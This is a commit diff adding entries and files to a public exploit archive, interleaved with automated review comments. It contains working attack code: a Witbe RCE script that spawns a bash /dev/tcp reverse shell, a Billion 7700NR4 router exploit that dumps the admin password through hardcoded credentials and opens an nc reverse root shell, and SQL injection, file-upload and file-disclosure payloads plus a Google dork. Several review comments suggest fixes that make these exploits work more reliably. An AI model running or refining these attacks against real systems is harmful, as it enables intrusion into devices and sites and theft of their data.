DB: 2016-10-07
12 new exploits
phpBB 2.0.10 - Remote Command Execution (CGI)
Advance MLM Script - SQL Injection
Picosafe Web Gui - Multiple Vulnerabilities
Witbe - Remote Code Execution
PHP Classifieds Rental Script - Blind SQL Injection
B2B Portal Script - Blind SQL Injection
MLM Unilevel Plan Script v1.0.2 - SQL Injection
Just Dial Clone Script - SQL Injection
Comodo Dragon Browser - Unquoted Service Path Privilege Escalation
Billion Router 7700NR4 - Remote Command Execution
Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation
Exagate WEBPack Management System - Multiple Vulnerabilities
parent
5fbed83086
commit
cd9e638108
13 changed files with 657 additions and 1 deletions
13
files.csv
|
@ -520,7 +520,7 @@ id,file,description,date,author,platform,type,port
|
|||
670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
|
||||
671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0
|
||||
672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0
|
||||
673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
|
||||
673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
|
||||
675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0
|
||||
676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0
|
||||
677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
|
||||
|
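Review bot: the row for id 673 appears twice in this hunk, once as `platforms/php/webapps/673.cgi` and once as `platforms/php/webapps/673.pl`; the rendering has dropped the diff markers, so it reads like a duplicate id, but the 7/7 line counts in the hunk header show it is a one-line replacement of the .cgi path by the .pl path. Please confirm that `platforms/php/webapps/673.pl` is one of the 13 changed files in this commit and that no other row still points at `673.cgi`; the entry itself is dated 2004, so listing it among the "12 new exploits" in the commit message is only right in the sense that the file is new, not the finding.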
@ -3881,6 +3881,7 @@ id,file,description,date,author,platform,type,port
|
|||
4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0
|
||||
4227,platforms/windows/dos/4227.php,"PHP - PHP_gd2.dll imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
|
||||
4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143
|
||||
40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
|
||||
4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0
|
||||
4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
|
||||
|
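Review bot: the new row `40466,platforms/php/webapps/40466.txt,...` is inserted between the 2007-era ids 4228 and 4229 (around line 3881 of files.csv) instead of with the other 404xx rows that the last hunk appends at the end of the file; if the index is kept in id order this row belongs next to 40467. The placement looks like a sort or merge slip rather than intent.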
@ -36575,6 +36576,7 @@ id,file,description,date,author,platform,type,port
|
|||
40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
|
||||
40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
|
||||
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
|
||||
40454,platforms/php/webapps/40454.txt,"Picosafe Web Gui - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",php,webapps,0
|
||||
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
|
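Review bot: the new row dates `40454` as 2016-10-05 while the advisory it indexes (40454.txt, later in this commit) is dated 01.October.2016 by its author; the date column should follow the same convention as the neighbouring rows (publication date, as the Tulpa rows use), so please confirm which date is intended. The row is otherwise in id order and its description matches the advisory title.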
@ -36582,3 +36584,12 @@ id,file,description,date,author,platform,type,port
|
|||
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
|
||||
40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
|
||||
40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0
|
||||
40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script v1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
|
||||
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
|
||||
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
|
||||
40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
|
||||
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
|
||||
|
|
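Review bot: several of the nine appended rows classify their targets in ways the underlying files contradict. `40474` is filed as platform `hardware`, type `remote`, yet its advisory describes a PHP web interface (`login.php`, `emaillog.txt`, `api/phpinfo.php`), so `webapps` would match the other web entries in this file. `40470` is described only as "SQL Injection" while the file's own title claims "SQL & XSS Vulnerabilities"; since the file contains no XSS proof, the csv description is the defensible one and the file title should be brought in line. The port column is 0 for `40472` although that script talks to the device over HTTP and telnet; compare the Tulpa rows above, which record port 80 for their HTTP targets.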
|
39
platforms/cgi/webapps/40462.py
Executable file
|
@ -0,0 +1,39 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title: Witbe RCE (Remote Code Execution)
|
||||
# Exploit Author: BeLmar
|
||||
# Date: 05/10/2016
|
||||
# DEMO : https://youtu.be/ooUFXfUfIs0
|
||||
# Contact : hb.mz093@gmail.com
|
||||
# Vendor Homepage: http://www.witbe.net
|
||||
# Tested on: Windows7/10 & BackBox
|
||||
# Category: Remote Exploits
|
||||
|
||||
import urllib
|
||||
import urllib2
|
||||
import os
|
||||
|
||||
print " M MW M M XXMMrX, 2Mr72S MW7XS"
|
||||
print " MM MM M2 M SM MM MM M "
|
||||
print " M M ZM M M XM MMir0M MMrXS"
|
||||
print " MM M M M: M SM MM ZM M2 "
|
||||
print " MMa MMM M ZM MM XM M "
|
||||
print " XM M M iM 8MZ8W8 MM8BB"
|
||||
print " EXPLOIT BY BELMAR "
|
||||
print ""
|
||||
|
||||
print "Run NetCat Listner" # First Run Netcat Listner
|
||||
|
||||
rhost = raw_input('RHOST: ')
|
||||
lhost = raw_input('LHOST: ')
|
||||
lport = raw_input('LPORT: ')
|
||||
|
||||
url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'
|
||||
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'
|
||||
values = {'auth_login': '', #Leave it as it is
|
||||
'auth_pwd': '', #Leave it as it is
|
||||
'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1' }
|
||||
|
||||
data = urllib.urlencode(values)
|
||||
req = urllib2.Request(url, data)
|
||||
response = urllib2.urlopen(req)
|
||||
the_page = response.read()
|
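Review bot: the header block names no affected product or firmware version ("Witbe RCE", vendor homepage only), which leaves defenders unable to tell which Witbe appliances expose `/cgi-bin/applyConfig.pl`; please add a Version/Affected line, as the files.csv row for 40462 also lacks one. In the code, `urllib2.urlopen(req)` has no exception handling, so any non-2xx reply (a 401 or 500 from the target) ends the script with a traceback instead of a message; `user_agent` is defined but never attached to the `Request`, and `the_page` is read and then discarded. `lport` is also taken verbatim from `raw_input` and interpolated unchecked, so a typo there silently produces a malformed `file` value.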
69
platforms/hardware/remote/40472.py
Executable file
|
@ -0,0 +1,69 @@
|
|||
# Title : Billion Router 7700NR4 Remote Root Command Execution
|
||||
# Date : 06/10/2016
|
||||
# Author : R-73eN
|
||||
# Tested on: Billion Router 7700NR4
|
||||
# Vendor : http://www.billion.com/
|
||||
# Vulnerability Description:
|
||||
# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
|
||||
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these
|
||||
# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
|
||||
# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
|
||||
# You must change host with the target and reverse_ip with your attacking ip.
|
||||
# Fix:
|
||||
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.
|
||||
#
|
||||
|
||||
import requests
|
||||
import base64
|
||||
import socket
|
||||
import time
|
||||
|
||||
host = ""
|
||||
def_user = "user"
|
||||
def_pass = "user"
|
||||
reverse_ip = ""
|
||||
#Banner
|
||||
banner = ""
|
||||
banner +=" ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
|
||||
|
||||
# limited shell escape
|
||||
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'
|
||||
|
||||
def execute_payload(password):
|
||||
print "[+] Please run nc -lvp 1337 and then press any key [+]"
|
||||
raw_input()
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host,23))
|
||||
s.recv(1024)
|
||||
s.send("admin\r")
|
||||
a= s.recv(1024)
|
||||
time.sleep(1)
|
||||
s.send(password +"\r")
|
||||
time.sleep(1)
|
||||
s.recv(1024)
|
||||
s.send(evil + "\r")
|
||||
time.sleep(1)
|
||||
print "[+] If everything worked you should get a reverse shell [+]"
|
||||
print "[+] Warning pressing any key will close the SHELL [+]"
|
||||
raw_input()
|
||||
|
||||
|
||||
|
||||
|
||||
r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
|
||||
if(r.status_code == 200):
|
||||
print "[+] Seems the exploit worked [+]"
|
||||
print "[+] Dumping data . . . [+]"
|
||||
temp = r.text
|
||||
admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
|
||||
# print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
|
||||
execute_payload(str(base64.b64decode(admin_pass)))
|
||||
else:
|
||||
print "[-] Exploit Failed [-]"
|
||||
print "\n[+] https://www.infogen.al/ [+]\n\n"
|
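Review bot: `host` and `reverse_ip` are empty strings that the header tells the user to edit in the source, but nothing checks that they were set, so an unmodified run issues `requests.get("http:///backupsettings.conf", ...)` and fails with an unhelpful error; a guard that exits with a message when either is empty would fix that. `admin_pass = temp.split("<AdminPassword>")[1]...` raises IndexError whenever the tag is absent from the download, which is exactly the case on a patched device or an error page returned with status 200, and `a = s.recv(1024)` is assigned but never used. The header should also record the firmware version the 7700NR4 was tested on, since the finding (fixed `user`/`user` credentials giving access to `backupsettings.conf` with a base64-encoded `<AdminPassword>`) is version-dependent, and the "Fix" section, which tells owners to run this exploit against their own router, should instead recommend changing the admin password, disabling telnet and WAN-side management where the firmware allows it, and asking the ISP for updated firmware.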
100
platforms/hardware/remote/40474.txt
Executable file
|
@ -0,0 +1,100 @@
|
|||
Document Title:
|
||||
================
|
||||
Exagate WEBpack Management System Multiple Vulnerabilities
|
||||
|
||||
Author:
|
||||
========
|
||||
Halil Dalabasmaz
|
||||
|
||||
Release Date:
|
||||
==============
|
||||
07 OCT 2016
|
||||
|
||||
Product & Service Introduction:
|
||||
================================
|
||||
WEBPack is the individual built-in user-friendly and skilled web
|
||||
interface allowing web-based access to the main units of the SYSGuard
|
||||
and POWERGuard series. The advanced software enables the users to
|
||||
design their customized dashboard smoothly for a detailed monitoring
|
||||
and management of all the power outlet sockets & sensor and volt free
|
||||
contact ports, as well as relay outputs. User definition and authorization,
|
||||
remote access and update, detailed reporting and archiving are among the
|
||||
many features.
|
||||
|
||||
Vendor Homepage:
|
||||
=================
|
||||
http://www.exagate.com/
|
||||
|
||||
Vulnerability Information:
|
||||
===========================
|
||||
Exagate company uses WEBPack Management System software on the hardware.
|
||||
The software is web-based and it is provide control on the hardware. There are
|
||||
multiple vulnerabilities on that software.
|
||||
|
||||
Vulnerability #1: SQL Injection
|
||||
================================
|
||||
|
||||
There is no any filtering or validation mechanisim on "login.php". "username"
|
||||
and "password" inputs are vulnerable to SQL Injection attacks. Sample POST
|
||||
request is given below.
|
||||
|
||||
POST /login.php HTTP/1.1
|
||||
Host: <TARGET HOST>
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 37
|
||||
|
||||
username=root&password=' or 1=1--
|
||||
|
||||
Vulnerability #2: Unauthorized Access To Sensetive Information
|
||||
===============================================================
|
||||
|
||||
The software is capable of sending e-mail to system admins. But there is no
|
||||
any authorization mechanism to access e-mail logs. The e-mail logs can accessable
|
||||
anonymously from "http://<TARGET HOST>/emaillog.txt".
|
||||
|
||||
Vulnerability #3: Unremoved Configuration Files
|
||||
================================================
|
||||
|
||||
The software contains the PHP Info file on the following URL.
|
||||
|
||||
http://<TARGET HOST>/api/phpinfo.php
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities
|
||||
06 OCT 2016 - No response from vendor and re-attempted to contact vendor
|
||||
07 OCT 2016 - No response from vendor
|
||||
07 OCT 2016 - Public Disclosure
|
||||
|
||||
Discovery Status:
|
||||
==================
|
||||
Published
|
||||
|
||||
Affected Product(s):
|
||||
=====================
|
||||
Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)
|
||||
|
||||
Tested On:
|
||||
===========
|
||||
Exagate SYSGuard 3001
|
||||
|
||||
Disclaimer & Information:
|
||||
==========================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. BGA disclaims all warranties, either expressed or implied,
|
||||
including the warranties of merchantability and capability for a particular
|
||||
purpose. BGA or its suppliers are not liable in any case of damage, including
|
||||
direct, indirect, incidental, consequential loss of business profits or
|
||||
special damages.
|
||||
|
||||
Domain: www.bgasecurity.com
|
||||
Social: twitter.com/bgasecurity
|
||||
Contact: advisory@bga.com.tr
|
||||
|
||||
Copyright © 2016 | BGA Security LLC
|
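Review bot: in the Vulnerability #1 sample request, `Content-Length: 37` does not match the body shown: `username=root&password=' or 1=1--` is 33 bytes, whereas its URL-encoded form `username=root&password=%27+or+1%3D1--` is 37, so the body was pasted decoded; show the encoded form (or drop the Content-Length header) so the request is reproducible as written. Elsewhere, the advisory gives no software or firmware version for WEBPack or the SYSGuard 3001 (the "Affected Product(s)" line only guesses at "all Exagate hardwares"), "Vulnerability #3: Unremoved Configuration Files" is really an exposed `phpinfo.php` and should be named as such, and there are typos to fix: "mechanisim", "Sensetive", "accessable", "is provide control".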
65
platforms/php/webapps/40454.txt
Executable file
|
@ -0,0 +1,65 @@
|
|||
[-] Title : Picosafe Web Gui - Multiple Vulnerabilities
|
||||
[-] Author : Shahab Shamsi
|
||||
[-] Vendor : https://github.com/embeddedprojects/picosafe_webgui
|
||||
[-] Category : Webapps
|
||||
[-] Date : 01.October.2016
|
||||
|
||||
|
||||
|
||||
Vulnerable page :
|
||||
picosafe_webgui/webinterface/js/filemanager/filemanager.php
|
||||
|
||||
|
||||
|
||||
|
||||
==========================
|
||||
| Remote File Upload :
|
||||
==========================
|
||||
Vulnerable Source (RFU) :
|
||||
52: chmod($to, 0755);
|
||||
48: $to = realpath($curdir) . '/' . $name;
|
||||
40: function uploadfile($curdir)
|
||||
46: $name = $_FILES['files']['name'][0];
|
||||
|
||||
Exploit :
|
||||
<?php
|
||||
$uploadfile="YourFileName";
|
||||
$ch = curl_init("http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('file'=>"@$uploadfile"));
|
||||
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
|
||||
$result = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$result";
|
||||
?>
|
||||
|
||||
Location :
|
||||
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/FileName
|
||||
|
||||
|
||||
==========================
|
||||
| Local File Disclosure :
|
||||
==========================
|
||||
|
||||
Vulnerable Source (LFD) :
|
||||
17: $file = base64_decode($_GET['file']);
|
||||
18: DownloadFile($file);
|
||||
111: readfile($file);
|
||||
|
||||
POC :
|
||||
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?file=base64code-Filename
|
||||
|
||||
|
||||
==========================
|
||||
| Cross-Site Scripting :
|
||||
==========================
|
||||
|
||||
Vulnerable Source (XSS) :
|
||||
8: echo json_encode($data);
|
||||
7: $data = sortfiles($data);
|
||||
6: $data = listdirectory($directory);
|
||||
5: $directory = base64_decode($_GET['directory']);
|
||||
|
||||
POC :
|
||||
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=Base64-ScriptingCode
|
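Review bot: the RFU proof-of-concept posts a field named `file` (`array('file'=>"@$uploadfile")`), but the cited source reads `$_FILES['files']['name'][0]`, i.e. an array field named `files[]`, so the request as written never reaches the `uploadfile()` path; the `@filename` upload syntax it relies on is also disabled by default since PHP 5.6 (`CURLOPT_SAFE_UPLOAD`), where `CURLFile` is required. The quoted source lines are listed out of order (52, 48, 40, 46) and nothing shows how `filemanager.php` dispatches to `uploadfile($curdir)`. For the XSS section, the sink is `echo json_encode($data)`: whether that reflects executable markup depends on the response Content-Type, which the advisory does not state, so please include the response headers or the claim is unsupported as shown.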
60
platforms/php/webapps/40466.txt
Executable file
|
@ -0,0 +1,60 @@
|
|||
[x]========================================================================================================================================[x]
|
||||
| Title : Advance MLM Script SQL Vulnerabilities
|
||||
| Software : Advance MLM Script
|
||||
| Vendor : http://www.i-netsolution.com/
|
||||
| Demo : http://www.i-netsolution.com/item/advance-mlm-script/live_demo/236431
|
||||
| Google Dork : news_detail.php?newid= © MLM SCRIPT
|
||||
| Date : 06 October 2016
|
||||
| Author : OoN_Boy
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Technology : PHP
|
||||
| Database : MySQL
|
||||
| Price : $ 199
|
||||
| Description : MLM business upward day by day, Open Source MLM Script plays an important role for successful multilevel marketing business.
|
||||
Our advanced featured PHP MLM Script enables MLM companies to manage and run their express selling business more effectively towards a successful way.
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Exploit : http://localhost/mlm/news_detail.php?newid=%Inject_Here%26
|
||||
| Aadmin Page : http://localhost/[path]/admin/index.php
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Proof of concept : sqlmap -u "http://localhost/mlm/news_detail.php?newid=26" --invalid-string
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
---
|
||||
Parameter: newid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: newid=26' AND 4440=4440 AND 'AJmz'='AJmz
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: newid=26' OR SLEEP(5) AND 'FokP'='FokP
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 6 columns
|
||||
Payload: newid=jMCtRq' UNION ALL SELECT NULL,CONCAT(0x71787a7a71,0x48755652787877617966627661486164744748424b6155564f514370537747504c6e736876665150,0x7178787171),NULL,NULL,NULL,NULL-- Afye
|
||||
---
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Greetz : antisecurity.org batamhacker.or.id
|
||||
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
|
||||
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Hi All long time no see ^_^
|
||||
[x]========================================================================================================================================[x]
|
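Review bot: the advisory carries no product version for Advance MLM Script, and the `| Description` / `| Price` block is vendor marketing copied from the demo page that adds nothing to the finding; replace it with the affected version and a summary of the vulnerable input (`news_detail.php`, GET parameter `newid`). "Aadmin Page" is a typo for "Admin Page", and the `| Google Dork` line serves only to locate third-party installs and is not needed in a vulnerability record. The sqlmap output section is the useful part: it documents boolean-based, time-based and UNION-based injection, so the "SQL Injection" description in files.csv fits.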
61
platforms/php/webapps/40467.txt
Executable file
|
@ -0,0 +1,61 @@
|
|||
[x]========================================================================================================================================[x]
|
||||
| Title : PHP Classifieds Rental Script Blind SQL Vulnerabilities
|
||||
| Software : PHP Classifieds Rental Script
|
||||
| Vendor : http://www.i-netsolution.com/
|
||||
| Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
|
||||
| Date : 06 October 2016
|
||||
| Author : OoN_Boy
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Technology : PHP
|
||||
| Database : MySQL
|
||||
| Price : $ 99
|
||||
| Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed
|
||||
so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being
|
||||
an easy-to- use software, this Property Rental Script
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Exploit : http://localhost/product_details.php?refid=%Inject_Here%1319258872
|
||||
| Aadmin Page : http://localhost/[path]/admin/index.php
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
---
|
||||
Parameter: refid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ
|
||||
|
||||
Type: UNION query
|
||||
Title: MySQL UNION query (NULL) - 26 columns
|
||||
Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
|
||||
---
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Greetz : antisecurity.org batamhacker.or.id
|
||||
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
|
||||
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Hi All long time no see ^_^
|
||||
[x]========================================================================================================================================[x]
|
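Review bot: the title and the files.csv row call this "Blind SQL Injection", but the sqlmap output in the same file reports a working "MySQL UNION query (NULL) - 26 columns" payload, which is not blind; "SQL Injection" is the accurate classification. The `| Description` block ends mid-sentence ("this Property Rental Script"), no product version is given (as in 40466), and "Aadmin Page" is a typo.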
61
platforms/php/webapps/40468.txt
Executable file
|
@ -0,0 +1,61 @@
|
|||
[x]========================================================================================================================================[x]
|
||||
| Title : B2B Portal Script Blind SQL Vulnerabilities
|
||||
| Software : B2B Portal Script
|
||||
| Vendor : http://www.i-netsolution.com/
|
||||
| Demo : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275
|
||||
| Date : 06 October 2016
|
||||
| Author : OoN_Boy
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Technology : PHP
|
||||
| Database : MySQL
|
||||
| Price : $ 249
|
||||
| Description : Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script
|
||||
is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global
|
||||
portals to manage their online transactions with efficiency
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Exploit : http://localhost/advancedb2b/view-product.php?pid=294'
|
||||
| Aadmin Page : http://localhost/[path]/admin/index.php
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294"
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
---
|
||||
Parameter: pid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 33 columns
|
||||
Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp
|
||||
---
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Greetz : antisecurity.org batamhacker.or.id
|
||||
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
|
||||
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
|
||||
[x]========================================================================================================================================[x]
|
||||
|
||||
[x]========================================================================================================================================[x]
|
||||
| Hi All long time no see ^_^
|
||||
[x]========================================================================================================================================[x]
|
